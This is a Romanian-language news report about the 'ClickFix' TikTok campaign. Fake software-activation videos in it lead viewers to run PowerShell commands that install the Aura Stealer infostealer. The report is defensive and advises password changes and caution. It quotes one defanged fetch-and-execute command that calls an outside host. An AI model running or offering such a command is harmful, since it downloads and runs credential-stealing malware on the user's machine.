O nouă campanie de atacuri informatice utilizează videoclipuri pe TikTok pentru a răspândi malware de tip „infostealer”, exploatând înșelătorii legate de activarea software-urilor populare. Acest fenomen subliniază creșterea vulnerabilităților digitale și necesitatea conștientizării riscurilor în mediul online.

Camuflată ca tutoriale de activare pentru programe precum Windows, Microsoft 365, Adobe Premiere, Photoshop sau Spotify Premium, campania de hacking denumită ClickFix devine tot mai frecventă pe TikTok. Experții în securitate cibernetică avertizează asupra riscurilor acestor atacuri, care profită de încrederea utilizatorilor pentru a prelua controlul asupra sistemelor.

Cum funcționează aceste atacuri pe TikTok

Atacurile pornesc de la videoclipuri ce afișează comenzi scurte și aparent inofensive, recomandate să fie rulare ca administrator în PowerShell. Aceste comenzi, precum „iex (irm slmgr[.]win/photoshop)”, sunt folosite pentru a crea conexiuni către site-uri compromise.

Odată executate, comenzi precum acestea inițiază descărcarea unor fișiere malițioase. Primul, denumit updater.exe, este o variantă a malware-ului Aura Stealer, ce colectează informații sensibile, precum parole, cookie-uri, portofele de criptomonede și acreditări de aplicații.

Al doilea fișier, source.exe, descarcă și compilează cod în memorie folosind un compilator C#. Scopul final al acestui proces rămâne necunoscut, însă această metodă indică o intenție de a menține accesul la sistem sau de a executa comenzi neautorizate.

Riscuri și recomandări pentru utilizatori

Persoanele care au pătruns în astfel de scheme trebuie să considere că informațiile de autentificare au fost compromise. Reprezentanții securității recomandă schimbarea imediată a parolelor și activarea autentificării în doi pași acolo unde este posibil.

Pe fondul frecventării în creștere a campaniilor de malware, specialiștii avertizează să nu copierți și să nu executați comenzi din surse nesigure, precum videoclipuri sau site-uri suspecte. Chiar și un singur click greșit poate duce la expunerea întregului sistem.

Concluzia urmărește importanța unei informări continue asupra evoluțiilor în domeniul securității cibernetice. Monitorizarea atentă a noilor tactici ajută utilizatorii să se protejeze mai eficient în practicile digitale zilnice.